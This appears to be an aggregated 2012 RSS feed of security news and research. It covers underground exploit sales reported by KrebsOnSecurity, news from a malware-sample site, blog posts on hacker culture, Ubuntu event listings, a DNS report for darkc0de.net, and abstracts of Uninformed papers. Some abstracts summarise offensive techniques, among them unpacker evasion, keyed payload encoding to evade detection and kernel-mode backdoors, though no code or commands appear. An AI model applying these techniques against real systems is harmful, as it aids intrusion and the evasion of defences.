http://www.krebsonsecurity.com/feed/ Miscreants in the cyber underground are selling an exploit for a previously undocumented security hole in Oracle's Java software that attackers can use to remotely seize control over systems running the program, KrebsOnSecurity has learned.

==> Yahoo Email-Stealing Exploit Fetches $700

http://www.krebsonsecurity.com/feed/ A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site scripting” (XSS) weakness in yahoo.com that lets [...]

==> Beware Card- and Cash-Trapping at the ATM

http://www.krebsonsecurity.com/feed/ Many security-savvy readers of this blog have learned to be vigilant against ATM card skimmers and hidden devices that can record you entering your PIN at the cash machine. But experts say an increasing form of ATM fraud involves the use of simple devices capable of snatching cash and ATM cards from unsuspecting users.

==> New Search System, No More Accounts Needed [1]

http://www.offensivecomputing.net/?q=node/feed The new search system with the updated authentication system is online. There is still some missing functionality but it should let everyone download samples. If you find any problems please let me know. There will be some quirks as we move to the new version of the website. If you find any bugs please let me know on Twitter @openmalware. Danny [1] You still need a Google account to download the samples

==> State of Offensive Computing

http://www.offensivecomputing.net/?q=node/feed I would like to take this time to thank everyone that expressed their support while Offensive Computing was offline. It was a trying time and I really appreciate everyone's support. Without getting into any of the specifics of why the site was offline for two months, we are back and here to stay.

There are a couple of people who were instrumental in helping to keep everything up and running. Paul Royal, from the Georgia Tech Information Security Center, helped out significantly with hardware and the new home of the site. Kelcey Tietjen also stepped in and helped out tremendously. If you see either of them at some upcoming conferences (hint: Paul is giving a talk at Black Hat) buy them a drink.

There are a couple of changes that are going to happen that more accurately reflect the intentions of the site. First, the name will be changing to Open Malware. The new name more accurately reflects the purpose and intention of the site. Way back in 2005 the intention was to make this a place where you could find information related to malware and other types of hacking. As things (and life) have progressed it has changed into a malware research site, specifically with the ability to download malware samples. The domain will be OpenMalware.org in the very near future.

The second big item of news is that we will be transitioning to a download-only malware repository in the coming weeks. The blog site will be officially shutting down. There are much better forums maintained by commercial services that have taken up the role of a discussion area. Specifically the /r/ReverseEngineering and /r/Malware sub-Reddits, and OpenRCE are better avenues of communication. I will maintain a static version of the site to archive the old content.

To accommodate the new download site, there will be a couple of changes. First, a lot of the back end software has changed. Searches will be faster, more malware will be available, and the overall maintenance will be a lot easier. Second, you will need to have a valid, verified Google Account. Having a Google account allows us to use industry standard authentication, and most importantly not to have to maintain a user database. Get one here if you haven't already. In the meantime new account creation is disabled while we make the transition. Old accounts should work as normal.

Finally, we are discontinuing our commercial services. I would like to thank all of our customers for their business. You all helped to support this site and maintain an open service. We will be looking at transitioning to a non-profit status in the coming years. Thanks again, Danny Quist

==> VizSec 2012 Call for Papers Out

http://www.offensivecomputing.net/?q=node/feed VizSec 2012 will be held in mid-October as part of VisWeek in Seattle. Papers are due July 1.

The International Symposium on Visualization for Cyber Security (VizSec) is a forum that brings together researchers and practitioners from academia, government, and industry to address the needs of the cyber security community through new and insightful visualization techniques. Co-located this year with VisWeek, the 9th VizSec will provide new opportunities for the usability and visualization communities to collaborate and share insights on a broad range of security-related topics. Accepted papers will appear in the ACM Digital Library as part of the ACM International Conference Proceedings Series.

Important research problems often lie at the intersection of disparate domains. Our focus is to explore effective, scalable visual interfaces for security domains, where visualization may provide a distinct benefit, including computer forensics, reverse engineering, insider threat detection, cryptography, privacy, preventing 'user assisted' attacks, compliance management, wireless security, secure coding, and penetration testing in addition to traditional network security.

Human time and attention are precious resources. We are particularly interested in visualization and interaction techniques that effectively capture human analyst insights so that further processing may be handled by machines, freeing the analyst for other tasks. For example, a malware analyst might use a visualization system to analyze a new piece of malicious software and then facilitate generating a signature for future machine processing. When appropriate, research that incorporates multiple data sources, such as network packet captures, firewall rule sets and logs, DNS logs, web server logs, and/or intrusion detection system logs, is particularly desirable.

More information is on the web site: http://www.ornl.gov/sci/vizsec

==> Scalable, Automated Baremetal Malware Analysis

http://www.offensivecomputing.net/?q=node/feed This week I will be presenting on scalable, automated baremetal malware analysis at Black Hat Europe. My presentation will coincide with the release of NVMTrace, a tool that facilitates automated baremetal sample processing using inexpensive hardware and freely available technologies. More information is available at the following link: Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis If you are attending Black Hat Europe and malware analysis is a topic of interest to you, please attend my talk. If you are interested but will not be in attendance, please let me know and I will make my whitepaper and slide set available to you.

==> BHO Reversing

http://www.offensivecomputing.net/?q=node/feed For a long time now (BHOs have been supported since IE 4.0) malware writers have exploited BHO functionality to prey on IE users. Most evil BHOs (certainly if we talk about bankers) have two kinds of functionality: - monitoring/logging requests sent by the browser (POST dump) - password stealing - dynamic modification of HTML page code (HTML code injection), used e.g. for adding additional form fields intended to obtain more TAN codes or generally some (...) Read entire post here: BHO Reversing

==> Practical Malware Analysis - A Book Review and Curmudgeonly Rant on the State of Reverse Engineering

http://www.offensivecomputing.net/?q=node/feed Recently I was asked to review a pre-publication copy of Mike Sikorski and Andrew Honig's book Practical Malware Analysis by No Starch Press. I gave it an enthusiastic review, and I strongly believe this will become the de facto text for learning malware analysis in the future. This is a review of that book, and a short rant on reverse engineering. Before getting into Practical Malware Analysis, I hope you will indulge me in a rant about other books on the reverse engineering topic: They are not pretty. If you've taken one of my classes I recommend a few books for learning reversing, but climbing the steep mountain of pre-requisite material before you can attempt to be somewhat proficient is daunting. Specifically the books I recommended were based off of each individual author's own personal style of reverse engineering with the tools that were available at the time. The field has gotten much more accessible thanks to the awesome tools that are out there from companies like Hex-Rays and Zynamics. Practical Malware Analysis does a good job of tying together the methods of modern malware analysis. While most of the previous texts have done a good job of presenting the state of the art at their time, PMA overviews many of the tools that are in use in the modern day. Part 1 starts off with the basic static techniques, how to set up a virtual environment, and dynamic analysis. These initial steps are the basis for any good reversing environment. What is nice is that these topics aren't dwelled on for an entire book. Part 2 goes over the relationships of the Intel architecture, IDA Pro, modern compilers, and the Windows operating system to reverse engineering. Having an understanding of this as it applies to the reversing process is extremely important. Outside implementing a compiler, learning the fundamentals of the architecture is the most important skill a reverser can have for understanding the field.
The difference between an adequate reverser and a great reverser lies in the understanding of how the system interactions work. The rest of the book is focused on the advanced topics of dynamic analysis. Part 5 deals with all the ways that malware authors can make your life miserable, from anti-disassembly to packers. Part 6, Special Topics, talks about shellcode analysis, C++ specifics, and the ever-looming threat of 64-bit malware. I suspect that there will be a second edition once 64-bit malware comes in vogue. Overall the book is excellent for those that are new to this field. Experts love to curmudgeonly talk about how nothing is new anymore, everything sucks, and pine for the good old days of reverse engineering with some wire-wrap, a lead pencil, a 9-volt Duracell, and a single LED. If you consider yourself one of these people, reading this book is going to feel a lot like wearing someone else's underwear. If, on the other hand, you read it and put aside your natural skepticism of all things new, you might learn something. I really do like this book. Edit 3/4/2012: I have no financial interest in the book. The only thing I received was a reviewer's copy. This was not sponsored or paid for in any way by the authors or publishers.

==> CAST Slides: Hunting malware with Volatility v2.0

http://www.offensivecomputing.net/?q=node/feed Last week I gave a talk at the CAST forum about hunting malware with Volatility 2.0. In 40 slides I introduce the main features of this powerful forensic framework. All memory dumps discussed are snapshots from machines infected with modern malware and rootkits. http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf

==> Introduction to IDA Python

http://www.offensivecomputing.net/?q=node/feed The Introduction to IDA Python document by Ero Carrera is one of the better documents on scripting the IDA Pro platform available. After talking with Ero directly, I have received permission to host the PDF directly on Offensive Computing to make it available long-term. Enjoy. Introduction to IDA Python by Ero Carrera Danny

==> CSI:Internet series - Spyeye detection with Volatility v2 and kernel debugging the TDL4 rootkit

http://www.offensivecomputing.net/?q=node/feed Just in case you missed my forensic analysis contributions for the CSI:Internet series on h-online.com... CSI:Internet - A trip into RAM http://www.h-online.com/security/features/CSI-Internet-A-trip-into-RAM-1339479.html CSI:Internet - Open heart surgery http://www.h-online.com/security/features/CSI-Internet-Open-heart-surgery-1350313.html Enjoy!

==> Windows Internals: SkipThreadAttach

http://www.openrce.org/rss/feeds/blogs written by waleedassar.

==> darkc0de.net

http://www.robtex.com/dns/darkc0de.net.rss Summary --- Incoming mail for darkc0de.net is handled by one mail server at directionfindfree.com. Darkc0de.net has one IP number (208.73.211.9). Darkc0de.com and darkc0de.org are similar domain names. Also check www.darkc0de.net. It has six inlinks. Darkc0de.net uses the IPv4 number 208.73.211.9 only and the primary mail server mail.directionfindfree.com.
The IPv4 number 208.73.211.9 only: there are several hundred domains that only use the IPv4 number 208.73.211.9. Most of those use only the mail server mail.directionfindfree.com (example: estwana.com, hjesesign.com and static.inx-media.com), most of them use the primary mail server mail.directionfindfree.com and the last resort mail server (example: sino-pearl.com, free-idol.com and 91858.net) and three quarters of them are under the TLD "com" (example: nce123.com, abreuimages.com and forrestbivens.com).
The mail server mail.directionfindfree.com only: there are several hundred domains that only use the mail server mail.directionfindfree.com. A third of those point only to the IP number 208.73.210.174 (example: albania.diantedotrono.net, ns14.www.nopcls.com and businessinf.com), a third of them use only the IPv4 number 208.73.210.174 (example: ns.bestoncam.com, mail.petticonstruction.com and gonz0movies.com) and a third of them use only the IPv4 number 208.73.211.9 (example: sip.solfone.net, sexxxtube.net and 52wglm.com).
Trustworthiness, vendor reliability and privacy of this site is very poor. It is blacklisted in one list.
Domain Name Reputation (Source / Result):
* WOT: Trustworthiness, vendor reliability and privacy of this site is very poor
* BLACKLIST: LISTED IN BLACKLIST! multi.surbl.org
Result -- The following pages contain combined information gathered by searching several sources (Source / Date / Information):
* Dec 12, 2012 2:02:33 PM: Visible DNS Information
* Alexa, Dec 12, 2012 2:02:33 PM: Description, ranking and other stats
* rbls.org, Dec 12, 2012 2:02:32 PM: Blacklistings
* WOT, Dec 11, 2012 2:02:04 PM: Reputation
Total score 0/50, normalized to 1 out of 5 based on 5 tests (1/5). Check / Result:
* NS on different IP networks: NO
* NS delegation consistent with zone: NO
* Listed in DMOZ: NO
* Listed in Alexa top 100000: NO
* Good WOT rating: NO
* Indexed in Google: -
DNS Records ------- Base darkc0de.net (Record / Pref / Name / IP-number / Reverse / Route / Autonomous System):
* a: 208.73.211.9, (none), 208.73.208.0/21 Oversee 208-net, AS33626 OVERSEE Proxy aut-num for Oversee by MZIMA
* mx 10: mail.directionfindfree.com, 204.13.160.107, host204-13-160-107.oversee.net, 204.13.160.0/22 Oversee net
* ns: b.gtld-servers.net, 2001:503:231d::2:30, (none), ?; 192.33.14.30, 192.33.14.0/24 VeriSign Route, AS26415 VERISIGN-AS VeriSign, Inc
* ns: g.gtld-servers.net, 192.42.93.30, 192.42.93.0/24 VeriSign Route, AS36624 VERISIGN-AS VeriSign, Inc
* ns: h.gtld-servers.net, 192.54.112.30, 192.54.112.0/24 VeriSign Route, AS36623 VERISIGN-AS VeriSign, Inc
* ns: a.gtld-servers.net, 2001:503:a83e::2:30, ?; 192.5.6.30, 192.5.6.0/24 VeriSign Route, AS36621 VERISIGN-AS VeriSign, Inc
* ns: k.gtld-servers.net, 192.52.178.30, 192.52.178.0/24 VeriSign Route, AS36622 VERISIGN-AS VeriSign, Inc
* ns: d.gtld-servers.net, 192.31.80.30, 192.31.80.0/24 VeriSign Route, AS36617 VERISIGN-AS VeriSign, Inc
* ns: e.gtld-servers.net, 192.12.94.30, 192.12.94.0/24 VeriSign Route, AS36629 VERISIGN-AS VeriSign, Inc
* ns: j.gtld-servers.net, 192.48.79.30, 192.48.79.0/24 VeriSign Route, AS36626 VERISIGN-AS VeriSign, Inc
* ns: l.gtld-servers.net, 192.41.162.30, 192.41.162.0/24 VeriSign Route, AS36628 VERISIGN-AS VeriSign, Inc
* ns: i.gtld-servers.net, 192.43.172.30, 192.43.172.0/24 VeriSign Route, AS36616 VERISIGN-AS VeriSign, Inc
* ns: f.gtld-servers.net, 192.35.51.30, 192.35.51.0/24 VeriSign Route, AS36620 VERISIGN-AS VeriSign, Inc
* ns: m.gtld-servers.net, 192.55.83.30, 192.55.83.0/24 VeriSign Route, AS36627 VERISIGN-AS VeriSign, Inc
* ns: c.gtld-servers.net, 192.26.92.30, 192.26.92.0/24 VeriSign Route, AS36618 VERISIGN-AS VeriSign, Inc
gtld-servers.net oversee.net com directionfindfree.com
Graph - darkc0de.net
Shared --
IP numbers of host (1 item): * 208.73.211.9
Mail servers used by this domain (1 item): * mail.directionfindfree.com
IP numbers of mail servers (1 item): * 204.13.160.107
Reverse names of the mail servers (1 item): * host204-13-160-107.oversee.net
Other names of the mail servers (100 items): * 10.mtngprs.net * 5jbcourse.com * africanairport.com * aislebridal.com * all-you-can-dance.com * aparthotel-piccolo-suceava.promotur.ro.htmlfacebook.com * aperitivws.com * banatdrem.com * barstoolssupercenter.com * befaster.com * benift.com * bentiey.com * bitadvertiser.com * ccphil.com * cenimelody.com * chinaiu.com * chinatimeshares.com * continteal.com * coolsmiles.net * cztableware.com * detgujarat.com * dicsoinary.com * dns2.thermadorsevice.com * dot-edu.org * eaini.com * easter1.com * eb2byellowpages.net * eurowrestlers.com * fanktube.com * filmedownload.tv * filter.100topcamsites.com * filterspam.net * flayproxy.com * fusiombd.com * gamesage.com * gkdns.com.realymodels.net * got-casino.com * hydrams.com * inboxhostelworld.com * indiabulles.com * ispmonitor.com * jaluzitamir.com * junkracecar.com * kannadawap.com * keezm0vies.com * kleintierinfo.net * legacyinmates.com * mail.camperplaatsen.net * mail.cat4.com * mail.dyehousefinishes.com * mail.geneticonline.com * mail.masmuebles.net * mail.powernutrition4you.com * mail.pstet.com * mail.www.bo * manhours.net * mavimex.com * ns0.lavafiles.com * ns1.adorabletv.com * obraspublicaspr.com * operetion7.com * orginalbtc.com * parsz.com * petforestonline.com * phoneriot.com * piratebay2.com * rawgonso.com * rentfortmyers.com * shuanthesheep.com * smtp76.siphonclix.com * southendbathrooms.com * sx40.com * taqadomy.com * teachbanzi.com * textbug.com * thechedimuscat.com * thinksexist.com * tuxoo.com * twinsync.com * underunder.com * versomina.com * wayyn.com * ww.masajbucuresti.com.htmlfacebook.com * www.162by.com * www.abaixak.com * www.aldultporn.com * www.annahangtattoo.com * www.cag.in * www.campwyoming.com * www.feertv.com * www.hvooh.com * www.movie28.com * www.mp4mobilemovie.net * www.mywaygames.com * www.ninhgiang.net * www.razkide.com * www.salmanimage.com * www.saxwab.com * www.wankatwork.com * xorras.com
Host names beginning with darkc0de (2 items): * darkc0de.com * darkc0de.org
Similarly spelled domains (1 item): * darkcde.net

==> Book Review: This Machine Kills Secrets

http://www.spacerogue.net/wordpress/?feed=rss2 Book Review: This Machine Kills Secrets By: Andy Greenberg Penguin Group 2012 ISBN 978-1-101-59358-5 *Page references have been taken from the electronic iPad version I'll admit I haven't finished the whole book yet but the way the book portrays some events I was involved in differs from my own memory. I wanted to highlight those [...]

==> Hackers and Media Hype or Big Hacks That Never Really Happened

http://www.spacerogue.net/wordpress/?feed=rss2 I have been giving my talk “Hackers and Media Hype or Big Hacks That Never Really Happened” for a few months now and I think it is time to retire it. You may have seen it at Shmoocon Epilogue, Source Boston or Hope 9. If not catch the video below. I also have the entire [...]

==> Emails From Michael In Iran

http://www.spacerogue.net/wordpress/?feed=rss2 If publishing unsourced emails claiming to be from Iran is a newsworthy event then I guess we should all copy Mikko and do the same thing. A few years ago I received a chain of emails from ‘Michael’ that started out as the normal ‘teach me to hack’ emails I receive on an almost daily [...]

==> L0pht Hacker Space Visa

http://www.spacerogue.net/wordpress/?feed=rss2 The L0pht was not the first hacker space, in fact at the time of its creation in Boston there were at least two other such spaces, Sinister House and Messiah Village, which later moved and became New Hack City, or simply New Hack. L0pht wasn't even the cause of the recent explosion of hacker spaces [...]

==> FUD can Sometimes be Useful

http://www.spacerogue.net/wordpress/?feed=rss2 There has been a story making the rounds the last few weeks that is really bugging me. I was going to let it slide but the story just won't die and every time it comes around again I just get angrier. The problem is I don't think the story is actually true, which wouldn't be [...]

==> Handle Shmandle

http://www.spacerogue.net/wordpress/?feed=rss2 A lot of people ask me why I still use a handle and go by ‘Space Rogue’ instead of using my real name. Trust me it is kinda awkward to go to a respectable con like BSides, Blackhat or even RSA and introduce myself as ‘Space Rogue’. People always ask me to repeat myself as [...]

==> bleep the SCADA is Falling!!!

http://www.spacerogue.net/wordpress/?feed=rss2 Let me say first that SCADA (supervisory control and data acquisition) attacks are real, they do happen and should be a real concern. But if we look at the recent press surrounding such attacks we see little in the way of any hard evidence that such an attack actually occurred. Instead we see rumor and [...]

==> NASA Confirms but China Denies Satellite ‘hacking’

http://www.spacerogue.net/wordpress/?feed=rss2 Since I posted my previous item regarding my suspicions as to the validity of the claims of ‘interference’ with a US Government satellite there have been a few more developments. First NASA has come out and ‘confirmed’ the interference. According to NASA PAO: “NASA experienced two suspicious events with the Terra spacecraft in the summer and [...]

==> Rebuttal – “Hackers reportedly behind U.S. government satellite disruptions”

http://www.spacerogue.net/wordpress/?feed=rss2 First some historical background: this is at least the third time I have seen a similar story over the last 15 years. “bleep ‘hackers’ can control a satellite”; the previous two times it turned out to be false. The first time I was one of the first people to call the story suspect. It is hard [...]

==> We would like your feedback

http://www.spacerogue.net/wordpress/?feed=rss2 Getting your customers to fill out market satisfaction surveys is all the rage these days. “We greatly appreciate your feedback” Hey, it's free demographic marketing! It's also usually ego stroking; studies show that people tend to skew their own responses to the positive side of things. Generally I don't fill these things out at [...]

==> The Open Cloud Webinars: Stability, support and the latest cloud features: using the Ubuntu Cloud Archive

http://www.ubuntu.com/rss.xml The pace of innovation in the cloud is ferocious. And there's no better example than OpenStack - the fastest growing open source project ever, according to some reports. Join Ubuntu Server Engineering Manager Dave Walker, to learn how the Ubuntu Cloud Archive provides access to the very latest OpenStack features on long-term support releases of Ubuntu. The webinar will cover the principles behind the Ubuntu Cloud Archive and its use in the enterprise, enabling you and your organisation to make the most of the open cloud. Location: Online Time: Wed, 2012-11-07 16:00

==> The Open Cloud Webinars: Running OpenStack Folsom on Ubuntu 12.10 and Ubuntu 12.04 LTS

http://www.ubuntu.com/rss.xml The second webinar of our Ubuntu 12.10 series focuses on Folsom, the latest release of OpenStack. In this webinar, Ubuntu Server Engineering Manager Dave Walker will talk you through the process of deploying Folsom on Ubuntu 12.10 and 12.04 LTS, showcasing some of the unique deployment tools that make Ubuntu the fastest route to a fully-operative, enterprise-grade OpenStack cloud. Join us, learn more and ask questions live! Location: Online Time: Wed, 2012-10-31 17:00

==> The Open Cloud Webinars: New features in Ubuntu 12.10, the world’s most cloud-friendly OS

http://www.ubuntu.com/rss.xml Another 6 months have passed so it's time for the next Ubuntu release! Join Mark Baker, Ubuntu Server Product Manager, to find out about the new features in Ubuntu 12.10 and how you can take advantage of them. Whether you are new to Ubuntu or using it already, this webinar will give you an insight into 12.10 for both server and cloud computing. Register today and ask questions live! Location: Online Time: Tue, 2012-10-23 16:00

==> Ubuntu Enterprise Summit

http://www.ubuntu.com/rss.xml The Ubuntu Enterprise Summit is a one-day conference aimed at technologists and IT decision-makers. At this year's event, analysts and technologists will join key figures from Canonical to discuss the new best practice and the road ahead for enterprise IT. For more information and to view the agenda, visit: http://uds.ubuntu.com/enterprise-summit/ Location: Copenhagen, Denmark Time: Tue, 2012-10-30 (All day)

==> Ubuntu Developer Summit

http://www.ubuntu.com/rss.xml Come and join us for yet another fantastic, action-packed Ubuntu Developer Summit! This time, we're in Europe at the Bella Centre in Copenhagen. Registration is free and spaces are limited so hurry! The Ubuntu Developer Summit is the event where we plan for the forthcoming version of Ubuntu. It brings together Canonical engineers, community members, partners, upstream representatives and cloud specialists, in an environment of active debate. For more information, visit: http://uds.ubuntu.com Location: Copenhagen, Denmark Time: Mon, 2012-10-29 (All day) - Thu, 2012-11-01 (All day)

==> DroidCon

http://www.ubuntu.com/rss.xml Canonical is a Partner Sponsor at the upcoming DroidCon event. Location: London, UK Time: Thu, 2012-10-25 (All day) - Fri, 2012-10-26 (All day)

==> Mass TLC: Cloud Summit

http://www.ubuntu.com/rss.xml Canonical will have a presence at Mass TLC's upcoming Cloud Summit. If you're in the area, stop by and say hello! Location: Boston, USA Time: Fri, 2012-10-19 (All day)

==> The OpenStack Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be one of the premier sponsors of the OpenStack Summit. Ubuntu Founder, Mark Shuttleworth, will be presenting a keynote session and the Canonical team will be there, so stop by our booth and say hello! Canonical was the first company to commercially distribute and support OpenStack - and Ubuntu has remained the reference operating system for the OpenStack project since the beginning. We include it in every download and CD of Ubuntu Server, which gives us a huge interest in its continuing development. Canonical is also one of eight members of the OpenStack Foundation. Location: San Diego, USA Time: Mon, 2012-10-15 (All day) - Thu, 2012-10-18 (All day)

==> Zentyal Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be a Premier Sponsor for the upcoming Zentyal Summit. Zentyal is an official Ubuntu Advantage Reseller. For more information, visit: http://events.zentyal.com/2012/10/04/zentyal-summit-2012-2/ Location: Zaragoza, Spain Time: Thu, 2012-10-04 (All day)

==> New Landscape Features and Functionality

http://www.ubuntu.com/rss.xml Landscape is the Ubuntu systems management tool, proven to save time and money when managing Ubuntu deployments at scale. Join this webinar to learn about new features including role-based access control, bare-metal provisioning and its full API, alongside reporting capabilities and other tools to give you total operational awareness. You'll gain a comprehensive insight into how Landscape's enterprise systems management and regulatory compliance functionality can help an organisation tame complexity. Location: Webinar Time: Thu, 2012-09-20 16:00

==> Using dual-mappings to evade automated unpackers

http://www.uninformed.org/uninformed.rss Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.

==> Analyzing local privilege escalations in win32k

http://www.uninformed.org/uninformed.rss This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.

==> Exploiting Tomorrow's Internet Today: Penetration testing with IPv6

http://www.uninformed.org/uninformed.rss This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.

==> Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS

http://www.uninformed.org/uninformed.rss In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.

==> An Objective Analysis of the Lockdown Protection System for Battle.net

http://www.uninformed.org/uninformed.rss Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, it introduced several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.

==> ActiveX - Active Exploitation

http://www.uninformed.org/uninformed.rss This paper provides a general introduction to the topic of understanding software vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.

==> Context-keyed Payload Encoding

http://www.uninformed.org/uninformed.rss A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.

==> Improving Software Security Analysis using Exploitation Properties

http://www.uninformed.org/uninformed.rss Reliable exploitation of security vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.

==> Real-time Steganography with RTP

http://www.uninformed.org/uninformed.rss Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.

==> OS X Kernel-mode Exploitation in a Weekend

http://www.uninformed.org/uninformed.rss Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finishes with remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

==> A Catalog of Local Windows Kernel-mode Backdoor Techniques

http://www.uninformed.org/uninformed.rss This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits.

==> Generalizing Data Flow Information

http://www.uninformed.org/uninformed.rss Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset.

==> Reducing the Effective Entropy of GS Cookies

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.

==> Memalyze: Dynamic Analysis of Memory Access Behavior in Software

